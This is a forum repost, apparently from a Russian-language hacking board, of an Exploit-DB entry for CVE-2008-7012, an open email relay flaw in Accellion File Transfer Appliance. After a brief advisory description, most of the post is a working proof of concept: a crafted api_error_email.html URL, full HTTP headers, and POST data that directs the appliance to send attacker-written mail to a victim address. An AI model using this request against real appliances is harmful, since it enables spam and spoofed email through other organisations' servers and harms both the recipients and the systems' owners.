Exploit Accellion File Transfer Appliance Error Report Message - Open Email Relay

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32382
Проверка EDB
  1. Пройдено
Автор
ERIC BEAULIEU
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2008-7012
Дата публикации
2008-09-15
Код:
source: https://www.securityfocus.com/bid/31178/info

Accellion File Transfer Appliance is prone to an open-email-relay vulnerability.

An attacker could exploit this issue by constructing a script that would send unsolicited spam to an unrestricted amount of email addresses from a forged email address.

This issue affects Accellion File Transfer Appliance prior to FTA_7_0_189.

https://www.example.com/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> HTTP HEADER: Host: [Accelion web server] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv: 1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> Content-Type: application/x-www-form-urlencoded Content-Length: 131 POST DATA: description=Could+you+please+close+this+tickets%0D%0A%0D%0ARegards&client_email=email_to_spam% 40victim_domain.com&submit=Soumettre+le+rapport
 
Источник
www.exploit-db.com

Похожие темы